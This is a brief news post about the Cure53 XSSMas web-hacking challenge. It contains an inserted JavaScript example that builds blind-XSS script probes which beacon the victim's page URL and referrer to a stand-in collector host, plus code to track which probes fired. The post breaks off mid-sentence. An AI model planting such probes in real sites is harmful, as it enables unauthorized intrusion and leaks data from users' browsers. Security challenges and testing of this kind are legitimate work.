
Cure53 XSSMas Hacking Challenge 2016 Underway

The Cure53 XSSMas Challenge, first run in 2013, is a recurring hacking event in which participants must solve a complex security puzzle, hacking a web site by any means necessary, to win money and fame.

'Any means' does not preclude rules of engagement. For example, the 2015 challenge required hacking without user interaction, i.e. setting an XSS trap and waiting for it to fire, as in the case of blind XSS.
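The "set a trap and wait" model behind blind XSS, as an added example that is not part of the original post or of the Cure53 challenge. The attacker plants a beacon in every input field that might later be rendered unescaped somewhere else (an admin panel, a log viewer) and, because each beacon carries a correlation id, the collector can say which injection point fired and in what page. The collector host, the registry and all function names are hypothetical; the payload is a plain detection beacon, not a filter bypass.

```javascript
// Added example, not the challenge's own code. Collector URL is hypothetical.
const COLLECTOR = "https://collector.example/hit";

// Registry of probes we planted, keyed by correlation id.
const planted = new Map();

// Build one probe for one injection point. The id ties the eventual
// callback back to the field the probe was planted in; the beacon itself
// is a GET via an Image object, so it survives contexts where fetch/XHR
// would be blocked by a same-origin check.
function buildProbe(injectionPoint) {
  const id = `p${planted.size + 1}-${injectionPoint.replace(/[^a-z0-9]/gi, "")}`;
  const js =
    `new Image().src=${JSON.stringify(COLLECTOR)}` +
    `+"?id=${id}&loc="+encodeURIComponent(location.href)` +
    `+"&ref="+encodeURIComponent(document.referrer)`;
  planted.set(id, { injectionPoint, firedAt: null, context: null });
  return { id, payload: `<script>${js}</script>` };
}

// Collector side: given the URL a victim browser requested when a trap
// fired, mark the matching probe as triggered and return what we learned.
// Unknown ids (noise, replays, scanners hitting the collector) are ignored.
function recordCallback(requestUrl, now = new Date()) {
  const url = new URL(requestUrl);
  const id = url.searchParams.get("id");
  const probe = planted.get(id);
  if (!probe) return null;
  probe.firedAt = now;
  probe.context = {
    location: url.searchParams.get("loc"),
    referrer: url.searchParams.get("ref"),
  };
  return { id, injectionPoint: probe.injectionPoint, firedAt: now, ...probe.context };
}

// Probes that have not reported back yet: these are the traps still waiting.
function pending() {
  return [...planted].filter(([, p]) => p.firedAt === null).map(([id]) => id);
}

// Probes that did fire, with the injection point and the page that rendered them.
function fired() {
  return [...planted]
    .filter(([, p]) => p.firedAt !== null)
    .map(([id, p]) => ({ id, injectionPoint: p.injectionPoint, ...p.context }));
}
```

In use you would call `buildProbe` once per candidate field, submit each `payload`, point the collector's request log at `recordCallback`, and check `pending()` and `fired()` days later; the value of the correlation id is that a single hit from some internal page tells you exactly which form field was stored unescaped.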

So as not to spoil this year's challenge, which was posted today, we look back instead at last year's. It required hackers to begin at index.php and progressively break through to index3.php in order to obtain the prize.
What was actually required is nicely summed up in:
  • Find a way to bypass the XSS filters of all browsers by realizing the string


Full article on i-programmer.info